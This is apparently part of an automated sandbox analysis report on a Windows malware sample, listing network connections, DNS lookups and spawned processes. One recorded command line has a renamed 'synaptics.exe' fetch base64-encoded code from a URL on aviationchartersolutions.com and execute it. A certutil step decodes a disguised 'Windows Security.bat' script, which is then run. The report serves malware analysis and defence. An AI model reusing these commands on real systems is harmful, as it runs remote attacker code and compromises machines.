                                                                                                                                                                                                                Icon Hash:1c1c1e4e4ececedc
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.844713926 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.844764948 CET4434970352.0.145.89192.168.2.16
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.844847918 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.845953941 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.845973015 CET4434970352.0.145.89192.168.2.16
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.078682899 CET4434970352.0.145.89192.168.2.16
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.080255032 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.080286026 CET4434970352.0.145.89192.168.2.16
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.081326008 CET4434970352.0.145.89192.168.2.16
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.081389904 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.083039045 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.083180904 CET4434970352.0.145.89192.168.2.16
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.083199024 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                Dec 20, 2024 14:38:24.083225965 CET49703443192.168.2.1652.0.145.89
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Dec 20, 2024 14:38:21.945223093 CET6055753192.168.2.161.1.1.1
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.841490030 CET53605571.1.1.1192.168.2.16
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 20, 2024 14:38:21.945223093 CET192.168.2.161.1.1.10x7af3Standard query (0)www.aviationchartersolutions.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 20, 2024 14:37:16.699708939 CET1.1.1.1192.168.2.160x9e05No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 20, 2024 14:37:16.699708939 CET1.1.1.1192.168.2.160x9e05No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.841490030 CET1.1.1.1192.168.2.160x7af3No error (0)www.aviationchartersolutions.comcpanel119.turbify.bizCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Dec 20, 2024 14:38:22.841490030 CET1.1.1.1192.168.2.160x7af3No error (0)cpanel119.turbify.biz52.0.145.89A (IP address)IN (0x0001)false

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                Start time:08:37:21
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                Imagebase:0x7ff6b7840000
                                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                Start time:08:37:56
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tmp\New Text Document.bat" "
                                                                                                                                                                                                                Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                Start time:08:37:56
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                Start time:08:37:56
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"
                                                                                                                                                                                                                Imagebase:0x350000
                                                                                                                                                                                                                File size:100'120 bytes
                                                                                                                                                                                                                MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                Start time:08:37:56
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
                                                                                                                                                                                                                Imagebase:0x7ff739510000
                                                                                                                                                                                                                File size:1'651'712 bytes
                                                                                                                                                                                                                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                Start time:08:38:09
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\notepad.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Windows\System32\NOTEPAD.EXE" C:\Users\user\Desktop\tmp\New Text Document.bat
                                                                                                                                                                                                                Imagebase:0x7ff7cda80000
                                                                                                                                                                                                                File size:201'216 bytes
                                                                                                                                                                                                                MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                Start time:08:38:39
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
                                                                                                                                                                                                                Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                Start time:08:38:39
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                Start time:08:38:49
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\notepad.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Public\Windows Security.bat
                                                                                                                                                                                                                Imagebase:0x7ff7cda80000
                                                                                                                                                                                                                File size:201'216 bytes
                                                                                                                                                                                                                MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                Start time:08:39:01
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" "
                                                                                                                                                                                                                Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                Start time:08:39:01
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                Start time:08:39:11
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\OpenWith.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                Imagebase:0x7ff7fec70000
                                                                                                                                                                                                                File size:123'984 bytes
                                                                                                                                                                                                                MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                Start time:08:39:14
                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\notepad.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Windows Security
                                                                                                                                                                                                                Imagebase:0x7ff7cda80000
                                                                                                                                                                                                                File size:201'216 bytes
                                                                                                                                                                                                                MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                No disassembly